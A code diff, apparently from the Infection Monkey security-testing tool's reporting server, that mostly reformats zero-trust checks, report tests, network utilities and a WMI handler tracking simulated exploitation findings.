- status=found_elastic_search_server,
- events=events,
+ test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC,
+ status=found_elastic_search_server,
+ events=events,
)
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_DATA_ENDPOINT_POSTGRESQL,
- status=found_postgresql_server,
- events=events,
+ test=zero_trust_consts.TEST_DATA_ENDPOINT_POSTGRESQL,
+ status=found_postgresql_server,
+ events=events,
)
MonkeyZTFindingService.add_malicious_activity_to_timeline(events)
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py
index 9bf0f5de6..30b0a7509 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/machine_exploited.py
@@ -8,30 +8,30 @@ from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_serv
def check_machine_exploited(current_monkey, exploit_successful, exploiter, target_ip, timestamp):
events = [
Event.create_event(
- title="Exploit attempt",
- message="Monkey on {} attempted to exploit {} using {}.".format(
- current_monkey.hostname, target_ip, exploiter
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- timestamp=timestamp,
+ title="Exploit attempt",
+ message="Monkey on {} attempted to exploit {} using {}.".format(
+ current_monkey.hostname, target_ip, exploiter
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ timestamp=timestamp,
)
]
status = zero_trust_consts.STATUS_PASSED
if exploit_successful:
events.append(
- Event.create_event(
- title="Exploit success!",
- message="Monkey on {} successfully exploited {} using {}.".format(
- current_monkey.hostname, target_ip, exploiter
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- timestamp=timestamp,
- )
+ Event.create_event(
+ title="Exploit success!",
+ message="Monkey on {} successfully exploited {} using {}.".format(
+ current_monkey.hostname, target_ip, exploiter
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ timestamp=timestamp,
+ )
)
status = zero_trust_consts.STATUS_FAILED
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events
+ test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events
)
MonkeyZTFindingService.add_malicious_activity_to_timeline(events)
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py
index acc3e6bfa..09940e3da 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/segmentation.py
@@ -18,7 +18,8 @@ SEGMENTATION_DONE_EVENT_TEXT = (
)
SEGMENTATION_VIOLATION_EVENT_TEXT = (
- "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment {source_seg}) "
+ "Segmentation violation! Monkey on '{hostname}', with the {source_ip} IP address (in segment "
+ "{source_seg}) "
"managed to communicate cross segment to {target_ip} (in segment {target_seg})."
)
@@ -33,17 +34,17 @@ def check_segmentation_violation(current_monkey, target_ip):
target_subnet = subnet_pair[1]
if is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet):
event = get_segmentation_violation_event(
- current_monkey, source_subnet, target_ip, target_subnet
+ current_monkey, source_subnet, target_ip, target_subnet
)
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_SEGMENTATION,
- status=zero_trust_consts.STATUS_FAILED,
- events=[event],
+ test=zero_trust_consts.TEST_SEGMENTATION,
+ status=zero_trust_consts.STATUS_FAILED,
+ events=[event],
)
def is_segmentation_violation(
- current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str
+ current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str
) -> bool:
"""
Checks is a specific communication is a segmentation violation.
@@ -51,7 +52,8 @@ def is_segmentation_violation(
:param target_ip: The target with which the current monkey communicated with.
:param source_subnet: The segment the monkey belongs to.
:param target_subnet: Another segment which the monkey isn't supposed to communicate with.
- :return: True if this is a violation of segmentation between source_subnet and target_subnet; Otherwise, False.
+ :return: True if this is a violation of segmentation between source_subnet and
+ target_subnet; Otherwise, False.
"""
if source_subnet == target_subnet:
return False
@@ -60,7 +62,7 @@ def is_segmentation_violation(
if target_subnet_range.is_in_range(str(target_ip)):
cross_segment_ip = get_ip_in_src_and_not_in_dst(
- current_monkey.ip_addresses, source_subnet_range, target_subnet_range
+ current_monkey.ip_addresses, source_subnet_range, target_subnet_range
)
return cross_segment_ip is not None
@@ -68,17 +70,17 @@ def is_segmentation_violation(
def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet):
return Event.create_event(
- title="Segmentation event",
- message=SEGMENTATION_VIOLATION_EVENT_TEXT.format(
- hostname=current_monkey.hostname,
- source_ip=get_ip_if_in_subnet(
- current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet)
+ title="Segmentation event",
+ message=SEGMENTATION_VIOLATION_EVENT_TEXT.format(
+ hostname=current_monkey.hostname,
+ source_ip=get_ip_if_in_subnet(
+ current_monkey.ip_addresses, NetworkRange.get_range_obj(source_subnet)
+ ),
+ source_seg=source_subnet,
+ target_ip=target_ip,
+ target_seg=target_subnet,
),
- source_seg=source_subnet,
- target_ip=target_ip,
- target_seg=target_subnet,
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
)
@@ -94,31 +96,32 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey):
this_monkey_subnets = []
for subnet in all_subnets:
if (
- get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet))
- is not None
+ get_ip_if_in_subnet(current_monkey.ip_addresses, NetworkRange.get_range_obj(subnet))
+ is not None
):
this_monkey_subnets.append(subnet)
# Get all the other subnets.
other_subnets = list(set(all_subnets) - set(this_monkey_subnets))
- # Calculate the cartesian product - (this monkey subnets X other subnets). These pairs are the pairs that the monkey
+ # Calculate the cartesian product - (this monkey subnets X other subnets). These pairs are
+ # the pairs that the monkey
# should have tested.
all_subnets_pairs_for_this_monkey = itertools.product(this_monkey_subnets, other_subnets)
for subnet_pair in all_subnets_pairs_for_this_monkey:
MonkeyZTFindingService.create_or_add_to_existing(
- status=zero_trust_consts.STATUS_PASSED,
- events=[get_segmentation_done_event(current_monkey, subnet_pair)],
- test=zero_trust_consts.TEST_SEGMENTATION,
+ status=zero_trust_consts.STATUS_PASSED,
+ events=[get_segmentation_done_event(current_monkey, subnet_pair)],
+ test=zero_trust_consts.TEST_SEGMENTATION,
)
def get_segmentation_done_event(current_monkey, subnet_pair):
return Event.create_event(
- title="Segmentation test done",
- message=SEGMENTATION_DONE_EVENT_TEXT.format(
- hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1]
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ title="Segmentation test done",
+ message=SEGMENTATION_DONE_EVENT_TEXT.format(
+ hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1]
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
)
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py
index aa67a5175..9a2377fb9 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/test_segmentation_checks.py
@@ -30,7 +30,7 @@ class TestSegmentationChecks:
# There are 2 subnets in which the monkey is NOT
zt_seg_findings = Finding.objects(
- test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED
+ test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED
)
# Assert that there's only one finding with multiple events (one for each subnet)
@@ -39,24 +39,24 @@ class TestSegmentationChecks:
# This is a monkey from 2nd subnet communicated with 1st subnet.
MonkeyZTFindingService.create_or_add_to_existing(
- status=zero_trust_consts.STATUS_FAILED,
- test=zero_trust_consts.TEST_SEGMENTATION,
- events=[
- Event.create_event(
- title="sdf",
- message="asd",
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- )
- ],
+ status=zero_trust_consts.STATUS_FAILED,
+ test=zero_trust_consts.TEST_SEGMENTATION,
+ events=[
+ Event.create_event(
+ title="sdf",
+ message="asd",
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ )
+ ],
)
zt_seg_findings = Finding.objects(
- test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED
+ test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED
)
assert len(zt_seg_findings) == 1
zt_seg_findings = Finding.objects(
- test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED
+ test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED
)
assert len(zt_seg_findings) == 1
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py
index 092fd67e2..dadbc6729 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/tunneling.py
@@ -14,19 +14,19 @@ def check_tunneling_violation(tunnel_telemetry_json):
current_monkey = Monkey.get_single_monkey_by_guid(tunnel_telemetry_json["monkey_guid"])
tunneling_events = [
Event.create_event(
- title="Tunneling event",
- message="Monkey on {hostname} tunneled traffic through {proxy}.".format(
- hostname=current_monkey.hostname, proxy=tunnel_host_ip
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- timestamp=tunnel_telemetry_json["timestamp"],
+ title="Tunneling event",
+ message="Monkey on {hostname} tunneled traffic through {proxy}.".format(
+ hostname=current_monkey.hostname, proxy=tunnel_host_ip
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ timestamp=tunnel_telemetry_json["timestamp"],
)
]
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_TUNNELING,
- status=zero_trust_consts.STATUS_FAILED,
- events=tunneling_events,
+ test=zero_trust_consts.TEST_TUNNELING,
+ status=zero_trust_consts.STATUS_FAILED,
+ events=tunneling_events,
)
MonkeyZTFindingService.add_malicious_activity_to_timeline(tunneling_events)
diff --git a/monkey/monkey_island/cc/services/tests/reporting/test_report.py b/monkey/monkey_island/cc/services/tests/reporting/test_report.py
index 6cdc9befd..192268636 100644
--- a/monkey/monkey_island/cc/services/tests/reporting/test_report.py
+++ b/monkey/monkey_island/cc/services/tests/reporting/test_report.py
@@ -5,10 +5,10 @@ from bson import ObjectId
from monkey_island.cc.services.reporting.report import ReportService
TELEM_ID = {
- "exploit_creds": ObjectId(b"123456789000"),
- "system_info_creds": ObjectId(b"987654321000"),
- "no_creds": ObjectId(b"112233445566"),
- "monkey": ObjectId(b"665544332211"),
+ "exploit_creds":ObjectId(b"123456789000"),
+ "system_info_creds":ObjectId(b"987654321000"),
+ "no_creds":ObjectId(b"112233445566"),
+ "monkey":ObjectId(b"665544332211"),
}
MONKEY_GUID = "67890"
USER = "user-name"
@@ -23,56 +23,55 @@ EXPLOITER_CLASS_NAME = "exploiter-name"
# Below telem constants only contain fields relevant to current tests
EXPLOIT_TELEMETRY_TELEM = {
- "_id": TELEM_ID["exploit_creds"],
- "monkey_guid": MONKEY_GUID,
- "telem_category": "exploit",
- "data": {
- "machine": {
- "ip_addr": VICTIM_IP,
- "domain_name": VICTIM_DOMAIN_NAME,
+ "_id":TELEM_ID["exploit_creds"],
+ "monkey_guid":MONKEY_GUID,
+ "telem_category":"exploit",
+ "data":{
+ "machine":{
+ "ip_addr":VICTIM_IP,
+ "domain_name":VICTIM_DOMAIN_NAME,
},
- "info": {
- "credentials": {
- USER: {
- "username": USER,
- "lm_hash": LM_HASH,
- "ntlm_hash": NT_HASH,
+ "info":{
+ "credentials":{
+ USER:{
+ "username":USER,
+ "lm_hash":LM_HASH,
+ "ntlm_hash":NT_HASH,
}
}
},
},
}
-
SYSTEM_INFO_TELEMETRY_TELEM = {
- "_id": TELEM_ID["system_info_creds"],
- "monkey_guid": MONKEY_GUID,
- "telem_category": "system_info",
- "data": {
- "credentials": {
- USER: {
- "password": PWD,
- "lm_hash": LM_HASH,
- "ntlm_hash": NT_HASH,
+ "_id":TELEM_ID["system_info_creds"],
+ "monkey_guid":MONKEY_GUID,
+ "telem_category":"system_info",
+ "data":{
+ "credentials":{
+ USER:{
+ "password":PWD,
+ "lm_hash":LM_HASH,
+ "ntlm_hash":NT_HASH,
}
}
},
}
NO_CREDS_TELEMETRY_TELEM = {
- "_id": TELEM_ID["no_creds"],
- "monkey_guid": MONKEY_GUID,
- "telem_category": "exploit",
- "data": {
- "machine": {
- "ip_addr": VICTIM_IP,
- "domain_name": VICTIM_DOMAIN_NAME,
+ "_id":TELEM_ID["no_creds"],
+ "monkey_guid":MONKEY_GUID,
+ "telem_category":"exploit",
+ "data":{
+ "machine":{
+ "ip_addr":VICTIM_IP,
+ "domain_name":VICTIM_DOMAIN_NAME,
},
- "info": {"credentials": {}},
+ "info":{"credentials":{}},
},
}
-MONKEY_TELEM = {"_id": TELEM_ID["monkey"], "guid": MONKEY_GUID, "hostname": HOSTNAME}
+MONKEY_TELEM = {"_id":TELEM_ID["monkey"], "guid":MONKEY_GUID, "hostname":HOSTNAME}
@pytest.fixture
@@ -88,8 +87,8 @@ def test_get_stolen_creds_exploit(fake_mongo):
stolen_creds_exploit = ReportService.get_stolen_creds()
expected_stolen_creds_exploit = [
- {"origin": VICTIM_DOMAIN_NAME, "type": "LM hash", "username": USER},
- {"origin": VICTIM_DOMAIN_NAME, "type": "NTLM hash", "username": USER},
+ {"origin":VICTIM_DOMAIN_NAME, "type":"LM hash", "username":USER},
+ {"origin":VICTIM_DOMAIN_NAME, "type":"NTLM hash", "username":USER},
]
assert expected_stolen_creds_exploit == stolen_creds_exploit
@@ -101,9 +100,9 @@ def test_get_stolen_creds_system_info(fake_mongo):
stolen_creds_system_info = ReportService.get_stolen_creds()
expected_stolen_creds_system_info = [
- {"origin": HOSTNAME, "type": "Clear Password", "username": USER},
- {"origin": HOSTNAME, "type": "LM hash", "username": USER},
- {"origin": HOSTNAME, "type": "NTLM hash", "username": USER},
+ {"origin":HOSTNAME, "type":"Clear Password", "username":USER},
+ {"origin":HOSTNAME, "type":"LM hash", "username":USER},
+ {"origin":HOSTNAME, "type":"NTLM hash", "username":USER},
]
assert expected_stolen_creds_system_info == stolen_creds_system_info
diff --git a/monkey/monkey_island/cc/services/tests/test_config.py b/monkey/monkey_island/cc/services/tests/test_config.py
index c43a13be9..021acdd5c 100644
--- a/monkey/monkey_island/cc/services/tests/test_config.py
+++ b/monkey/monkey_island/cc/services/tests/test_config.py
@@ -6,13 +6,14 @@ from monkey_island.cc.services.config import ConfigService
IPS = ["0.0.0.0", "9.9.9.9"]
PORT = 9999
+
# If tests fail because config path is changed, sync with
# monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage/RunOptions.js
@pytest.fixture
def config(monkeypatch):
- monkeypatch.setattr("monkey_island.cc.services.config.local_ip_addresses", lambda: IPS)
+ monkeypatch.setattr("monkey_island.cc.services.config.local_ip_addresses", lambda:IPS)
monkeypatch.setattr(Environment, "_ISLAND_PORT", PORT)
config = ConfigService.get_default_config(True)
return config
diff --git a/monkey/monkey_island/cc/services/utils/bootloader_config.py b/monkey/monkey_island/cc/services/utils/bootloader_config.py
index f1eaf9368..c9ff785f5 100644
--- a/monkey/monkey_island/cc/services/utils/bootloader_config.py
+++ b/monkey/monkey_island/cc/services/utils/bootloader_config.py
@@ -1,11 +1,11 @@
MIN_GLIBC_VERSION = 2.14
SUPPORTED_WINDOWS_VERSIONS = {
- "xp_or_lower": False,
- "vista": False,
- "vista_sp1": False,
- "vista_sp2": True,
- "windows7": True,
- "windows7_sp1": True,
- "windows8_or_greater": True,
+ "xp_or_lower":False,
+ "vista":False,
+ "vista_sp1":False,
+ "vista_sp2":True,
+ "windows7":True,
+ "windows7_sp1":True,
+ "windows8_or_greater":True,
}
diff --git a/monkey/monkey_island/cc/services/utils/network_utils.py b/monkey/monkey_island/cc/services/utils/network_utils.py
index ba3c76939..ec9ef8cd5 100644
--- a/monkey/monkey_island/cc/services/utils/network_utils.py
+++ b/monkey/monkey_island/cc/services/utils/network_utils.py
@@ -22,6 +22,7 @@ if sys.platform == "win32":
else:
import fcntl
+
def local_ips():
result = []
try:
@@ -33,12 +34,12 @@ else:
struct_bytes = max_possible * struct_size
names = array.array("B", "\0" * struct_bytes)
outbytes = struct.unpack(
- "iL",
- fcntl.ioctl(
- s.fileno(),
- 0x8912, # SIOCGIFCONF
- struct.pack("iL", struct_bytes, names.buffer_info()[0]),
- ),
+ "iL",
+ fcntl.ioctl(
+ s.fileno(),
+ 0x8912, # SIOCGIFCONF
+ struct.pack("iL", struct_bytes, names.buffer_info()[0]),
+ ),
)[0]
if outbytes == struct_bytes:
max_possible *= 2
@@ -47,7 +48,7 @@ else:
namestr = names.tostring()
for i in range(0, outbytes, struct_size):
- addr = socket.inet_ntoa(namestr[i + 20 : i + 24])
+ addr = socket.inet_ntoa(namestr[i + 20: i + 24])
if not addr.startswith("127"):
result.append(addr)
# name of interface is (namestr[i:i+16].split('\0', 1)[0]
@@ -60,10 +61,13 @@ def is_local_ips(ips: List) -> bool:
return collections.Counter(ips) == collections.Counter(filtered_local_ips)
-# The local IP addresses list should not change often. Therefore, we can cache the result and never call this function
-# more than once. This stopgap measure is here since this function is called a lot of times during the report
+# The local IP addresses list should not change often. Therefore, we can cache the result and
+# never call this function
+# more than once. This stopgap measure is here since this function is called a lot of times
+# during the report
# generation.
-# This means that if the interfaces of the Island machine change, the Island process needs to be restarted.
+# This means that if the interfaces of the Island machine change, the Island process needs to be
+# restarted.
@lru(maxsize=1)
def local_ip_addresses():
ip_list = []
@@ -73,20 +77,23 @@ def local_ip_addresses():
return ip_list
-# The subnets list should not change often. Therefore, we can cache the result and never call this function
-# more than once. This stopgap measure is here since this function is called a lot of times during the report
+# The subnets list should not change often. Therefore, we can cache the result and never call
+# this function
+# more than once. This stopgap measure is here since this function is called a lot of times
+# during the report
# generation.
-# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted.
+# This means that if the interfaces or subnets of the Island machine change, the Island process
+# needs to be restarted.
@lru(maxsize=1)
def get_subnets():
subnets = []
for interface in interfaces():
addresses = ifaddresses(interface).get(AF_INET, [])
subnets.extend(
- [
- ipaddress.ip_interface(link["addr"] + "/" + link["netmask"]).network
- for link in addresses
- if link["addr"] != "127.0.0.1"
- ]
+ [
+ ipaddress.ip_interface(link["addr"] + "/" + link["netmask"]).network
+ for link in addresses
+ if link["addr"] != "127.0.0.1"
+ ]
)
return subnets
diff --git a/monkey/monkey_island/cc/services/utils/node_states.py b/monkey/monkey_island/cc/services/utils/node_states.py
index bf5f2211a..7e9305b83 100644
--- a/monkey/monkey_island/cc/services/utils/node_states.py
+++ b/monkey/monkey_island/cc/services/utils/node_states.py
@@ -38,13 +38,13 @@ class NodeStates(Enum):
]
if len(potential_groups) > 1:
raise MultipleGroupsFoundException(
- "Multiple groups contain provided keywords. "
- "Manually build group string to ensure keyword order."
+ "Multiple groups contain provided keywords. "
+ "Manually build group string to ensure keyword order."
)
elif len(potential_groups) == 0:
raise NoGroupsFoundException(
- "No groups found with provided keywords. "
- "Check for typos and make sure group codes want to find exists."
+ "No groups found with provided keywords. "
+ "Check for typos and make sure group codes want to find exists."
)
return potential_groups[0]
diff --git a/monkey/monkey_island/cc/services/utils/node_states_test.py b/monkey/monkey_island/cc/services/utils/node_states_test.py
index 98df5455b..02ce075c5 100644
--- a/monkey/monkey_island/cc/services/utils/node_states_test.py
+++ b/monkey/monkey_island/cc/services/utils/node_states_test.py
@@ -7,14 +7,14 @@ class TestNodeGroups(TestCase):
def test_get_group_by_keywords(self):
self.assertEqual(NodeStates.get_by_keywords(["island"]), NodeStates.ISLAND)
self.assertEqual(
- NodeStates.get_by_keywords(["running", "linux", "monkey"]),
- NodeStates.MONKEY_LINUX_RUNNING,
+ NodeStates.get_by_keywords(["running", "linux", "monkey"]),
+ NodeStates.MONKEY_LINUX_RUNNING,
)
self.assertEqual(
- NodeStates.get_by_keywords(["monkey", "linux", "running"]),
- NodeStates.MONKEY_LINUX_RUNNING,
+ NodeStates.get_by_keywords(["monkey", "linux", "running"]),
+ NodeStates.MONKEY_LINUX_RUNNING,
)
with self.assertRaises(NoGroupsFoundException):
NodeStates.get_by_keywords(
- ["bogus", "values", "from", "long", "list", "should", "fail"]
+ ["bogus", "values", "from", "long", "list", "should", "fail"]
)
diff --git a/monkey/monkey_island/cc/services/wmi_handler.py b/monkey/monkey_island/cc/services/wmi_handler.py
index fe401ce38..7ea6d6225 100644
--- a/monkey/monkey_island/cc/services/wmi_handler.py
+++ b/monkey/monkey_island/cc/services/wmi_handler.py
@@ -38,7 +38,7 @@ class WMIHandler(object):
def update_critical_services(self):
critical_names = ("W3svc", "MSExchangeServiceHost", "dns", "MSSQL$SQLEXPRES")
- mongo.db.monkey.update({"_id": self.monkey_id}, {"$set": {"critical_services": []}})
+ mongo.db.monkey.update({"_id":self.monkey_id}, {"$set":{"critical_services":[]}})
services_names_list = [str(i["Name"])[2:-1] for i in self.services]
products_names_list = [str(i["Name"])[2:-2] for i in self.products]
@@ -46,16 +46,16 @@ class WMIHandler(object):
for name in critical_names:
if name in services_names_list or name in products_names_list:
mongo.db.monkey.update(
- {"_id": self.monkey_id}, {"$addToSet": {"critical_services": name}}
+ {"_id":self.monkey_id}, {"$addToSet":{"critical_services":name}}
)
def build_entity_document(self, entity_info, monkey_id=None):
general_properties_dict = {
- "SID": str(entity_info["SID"])[4:-1],
- "name": str(entity_info["Name"])[2:-1],
- "machine_id": monkey_id,
- "member_of": [],
- "admin_on_machines": [],
+ "SID":str(entity_info["SID"])[4:-1],
+ "name":str(entity_info["Name"])[2:-1],
+ "machine_id":monkey_id,
+ "member_of":[],
+ "admin_on_machines":[],
}
if monkey_id:
@@ -72,7 +72,7 @@ class WMIHandler(object):
else:
base_entity = self.build_entity_document(user, self.monkey_id)
base_entity["NTLM_secret"] = self.users_secrets.get(base_entity["name"], {}).get(
- "ntlm_hash"
+ "ntlm_hash"
)
base_entity["SAM_secret"] = self.users_secrets.get(base_entity["name"], {}).get("sam")
base_entity["secret_location"] = []
@@ -105,25 +105,25 @@ class WMIHandler(object):
if "cimv2:Win32_UserAccount" in child_part:
# domain user
domain_name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split(
- '",Name="'
+ '",Name="'
)[0]
name = child_part.split('cimv2:Win32_UserAccount.Domain="')[1].split(
- '",Name="'
+ '",Name="'
)[1][:-2]
if "cimv2:Win32_Group" in child_part:
# domain group
domain_name = child_part.split('cimv2:Win32_Group.Domain="')[1].split(
- '",Name="'
+ '",Name="'
)[0]
name = child_part.split('cimv2:Win32_Group.Domain="')[1].split('",Name="')[1][
- :-2
- ]
+ :-2
+ ]
for entity in self.info_for_mongo:
if (
- self.info_for_mongo[entity]["name"] == name
- and self.info_for_mongo[entity]["domain"] == domain_name
+ self.info_for_mongo[entity]["name"] == name
+ and self.info_for_mongo[entity]["domain"] == domain_name
):
child_sid = self.info_for_mongo[entity]["SID"]
else:
@@ -141,42 +141,45 @@ class WMIHandler(object):
if entity["machine_id"]:
# Handling for local entities.
mongo.db.groupsandusers.update(
- {"SID": entity["SID"], "machine_id": entity["machine_id"]}, entity, upsert=True
+ {"SID":entity["SID"], "machine_id":entity["machine_id"]}, entity,
+ upsert=True
)
else:
# Handlings for domain entities.
- if not mongo.db.groupsandusers.find_one({"SID": entity["SID"]}):
+ if not mongo.db.groupsandusers.find_one({"SID":entity["SID"]}):
mongo.db.groupsandusers.insert_one(entity)
else:
- # if entity is domain entity, add the monkey id of current machine to secrets_location.
+ # if entity is domain entity, add the monkey id of current machine to
+ # secrets_location.
# (found on this machine)
if entity.get("NTLM_secret"):
mongo.db.groupsandusers.update_one(
- {"SID": entity["SID"], "type": USERTYPE},
- {"$addToSet": {"secret_location": self.monkey_id}},
+ {"SID":entity["SID"], "type":USERTYPE},
+ {"$addToSet":{"secret_location":self.monkey_id}},
)
def update_admins_retrospective(self):
for profile in self.info_for_mongo:
groups_from_mongo = mongo.db.groupsandusers.find(
- {"SID": {"$in": self.info_for_mongo[profile]["member_of"]}},
- {"admin_on_machines": 1},
+ {"SID":{"$in":self.info_for_mongo[profile]["member_of"]}},
+ {"admin_on_machines":1},
)
for group in groups_from_mongo:
if group["admin_on_machines"]:
mongo.db.groupsandusers.update_one(
- {"SID": self.info_for_mongo[profile]["SID"]},
- {"$addToSet": {"admin_on_machines": {"$each": group["admin_on_machines"]}}},
+ {"SID":self.info_for_mongo[profile]["SID"]},
+ {"$addToSet":{
+ "admin_on_machines":{"$each":group["admin_on_machines"]}}},
)
def add_admin(self, group, machine_id):
for sid in group["entities_list"]:
mongo.db.groupsandusers.update_one(
- {"SID": sid}, {"$addToSet": {"admin_on_machines": machine_id}}
+ {"SID":sid}, {"$addToSet":{"admin_on_machines":machine_id}}
)
entity_details = mongo.db.groupsandusers.find_one(
- {"SID": sid}, {"type": USERTYPE, "entities_list": 1}
+ {"SID":sid}, {"type":USERTYPE, "entities_list":1}
)
if entity_details.get("type") == GROUPTYPE:
self.add_admin(entity_details, machine_id)
diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py
index 8b4c7d97e..9c379989d 100644
--- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_details_service.py
@@ -14,21 +14,21 @@ class MonkeyZTDetailsService:
@staticmethod
def fetch_details_for_display(finding_id: ObjectId) -> dict:
pipeline = [
- {"$match": {"_id": finding_id}},
+ {"$match":{"_id":finding_id}},
{
- "$addFields": {
- "oldest_events": {"$slice": ["$events", int(MAX_EVENT_FETCH_CNT / 2)]},
- "latest_events": {"$slice": ["$events", int(-1 * MAX_EVENT_FETCH_CNT / 2)]},
- "event_count": {"$size": "$events"},
+ "$addFields":{
+ "oldest_events":{"$slice":["$events", int(MAX_EVENT_FETCH_CNT / 2)]},
+ "latest_events":{"$slice":["$events", int(-1 * MAX_EVENT_FETCH_CNT / 2)]},
+ "event_count":{"$size":"$events"},
}
},
- {"$unset": ["events"]},
+ {"$unset":["events"]},
]
detail_list = list(MonkeyFindingDetails.objects.aggregate(*pipeline))
if detail_list:
details = detail_list[0]
details["latest_events"] = MonkeyZTDetailsService._remove_redundant_events(
- details["event_count"], details["latest_events"]
+ details["event_count"], details["latest_events"]
)
return details
else:
@@ -36,7 +36,7 @@ class MonkeyZTDetailsService:
@staticmethod
def _remove_redundant_events(
- fetched_event_count: int, latest_events: List[object]
+ fetched_event_count: int, latest_events: List[object]
) -> List[object]:
overlap_count = fetched_event_count - int(MAX_EVENT_FETCH_CNT / 2)
# None of 'latest_events' are in 'oldest_events'
@@ -48,4 +48,4 @@ class MonkeyZTDetailsService:
# Some of 'latest_events' are already in 'oldest_events'.
# Return only those that are not
else:
- return latest_events[-1 * overlap_count :]
+ return latest_events[-1 * overlap_count:]
diff --git a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py
index 68f09fbe9..ba71e42b3 100644
--- a/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/monkey_findings/monkey_zt_finding_service.py
@@ -12,15 +12,17 @@ class MonkeyZTFindingService:
@staticmethod
def create_or_add_to_existing(test: str, status: str, events: List[Event]):
"""
- Create a new finding or add the events to an existing one if it's the same (same meaning same status and same
+ Create a new finding or add the events to an existing one if it's the same (same meaning
+ same status and same
test).
- :raises: Assertion error if this is used when there's more then one finding which fits the query - this is not
+ :raises: Assertion error if this is used when there's more then one finding which fits
+ the query - this is not
when this function should be used.
"""
existing_findings = list(MonkeyFinding.objects(test=test, status=status))
assert len(existing_findings) < 2, "More than one finding exists for {}:{}".format(
- test, status
+ test, status
)
if len(existing_findings) == 0:
@@ -44,17 +46,17 @@ class MonkeyZTFindingService:
def get_events_by_finding(finding_id: str) -> List[object]:
finding = MonkeyFinding.objects.get(id=finding_id)
pipeline = [
- {"$match": {"_id": ObjectId(finding.details.id)}},
- {"$unwind": "$events"},
- {"$project": {"events": "$events"}},
- {"$replaceRoot": {"newRoot": "$events"}},
+ {"$match":{"_id":ObjectId(finding.details.id)}},
+ {"$unwind":"$events"},
+ {"$project":{"events":"$events"}},
+ {"$replaceRoot":{"newRoot":"$events"}},
]
return list(MonkeyFindingDetails.objects.aggregate(*pipeline))
@staticmethod
def add_malicious_activity_to_timeline(events):
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE,
- status=zero_trust_consts.STATUS_VERIFY,
- events=events,
